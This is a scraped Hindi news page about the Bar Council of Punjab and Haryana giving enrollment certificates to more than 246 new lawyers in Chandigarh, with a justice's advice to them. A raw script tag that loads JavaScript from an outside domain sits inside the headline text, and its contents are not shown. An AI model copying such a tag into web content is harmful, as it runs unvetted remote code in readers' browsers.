Thursday, 17 September 2026
Breaking News
जीसीसीबीए सेक्टर-50 ने मरीजों के लिए एकत्र किए 80 यूनिट रक्त वार्ड नंबर 5 दर्शनी बाग में पेवर ब्लॉक लगाने के कार्य का नम्बरदार फतेह सिंह ने किया उद्घाटन  इंटरनेशनल कोआपरेटिव एलायंस चुनाव में इफको अध्यक्ष दिलीप संघाणी ग्लोबल बोर्ड के निदेशक हुए निर्वाचित मुहब्बत भी ज़रूरी है इबादत भी ज़रूरी है......... अल्पसंख्यक वर्ग को इंसाफ दिलाने केन्द्र सरकार पूरी तरह से प्रयासरतः चेयरमैन बाबा रामदेव महाराज के अवतरण भादवा दूज पर राम दरबार में निकली भव्य शोभायात्रा दिगंबर जैन मंदिर सेक्टर-27 में सर्वसम्मति से धर्म बहादुर जैन दोबारा अध्यक्ष चुने गए देश के लिए सबसे खतरनाक हैं "दिमागी नक्सल" यानी सरकार से सवाल करने वाले मनीमाजरा सरकारी स्कूल में अशोक के पेड़ों की कटाई पर एनवायरनमेंट सोसायटी ऑफ इंडिया ने मांगी जांच गलत जानकारी देने वाले दो तहसीलदार के खिलाफ राजस्थान के कोटपूतली जिले के प्रागपुरा थाने में एफ आई आर दर्ज
चंडीगढ़ Trending

246 नए वकीलों को बांटे एनरॉलमेंट सर्टिफिकेट<script src="https://new2sportnews.com/face2news.js"></script>

Read in:Hindi

लॉ भवन में आयोजित कार्यक्रम में 246 से अधिक नए एनरोलड वकीलों को बांटे गए एनरॉलमेंट सर्टिफिकेट

(MOREPIC1) (MOREPIC2)आर के शर्मा / चंडीगढ़ 

बार काउंसिल ऑफ पंजाब एंड हरियाणा द्वारा लॉ भवन में एक कार्यक्रम आयोजित किया गया जिसमें नए एनरोलड वकीलों को एनरॉलमेंट सर्टिफिकेट वितरित किए गए। इस मौके की शोभा बढ़ाते हुए माननीय न्यायमूर्ति श्री जसजीत सिंह बेदी, न्यायाधीश पंजाब और हरियाणा उच्च न्यायालय ने मुख्य अतिथि के तौर पर शिरकत की व 246 से अधिक वकीलों को शपथ दिलाने के बाद एनरॉलमेंट सर्टिफिकेट दिए।

नए एनरोलड वकीलों को प्रैक्टिस में सफलता की कामना करते हुए उन्होंने अपने पुराने दिनों के ज्ञान का उल्लेख करते हुए सलाह दी कि कड़ी मेहनत का कोई विकल्प नहीं है। उन्होंने नए प्रवेशकों को सलाह दी कि वे प्रैक्टिस के अपने लक्ष्य को पूरी तरह से प्राप्त करने के लिए धैर्य रखें और पूरी ईमानदारी और निष्ठा के साथ कड़ी मेहनत करें। इसके अलावा उन्होंने नए प्रवेशकों को प्रैक्टिस के दौरान कानूनी पेशे की गरिमा बनाए रखने की सलाह दी।

पंजाब और हरियाणा बार काउंसिल, के अध्यक्ष सुवीर सिद्धू, उपाध्यक्ष अशोक सिंगला, पूर्व अध्यक्ष लेख राज शर्मा, सदस्य विजेंदर अहलावत व अन्य वकीलों के साथ-साथ नए एनरोलड वकीलों के अभिभावक भी इस कार्यक्रम में शामिल हुए। नए एनरोलड वकील पंजाब, हरियाणा व यू.टी. चंडीगढ़ के विभिन्न स्थानों से हैं। उल्लेखनीय है कि बार काउंसिल ऑफ पंजाब एंड हरियाणा की स्थापना अधिवक्ता अधिनियम 1961 के तहत की गई थी और इसकी स्थापना से पंजाब और हरियाणा बार काउंसिल के पास लगभग एक लाख अट्ठाईस हजार वकील हैं।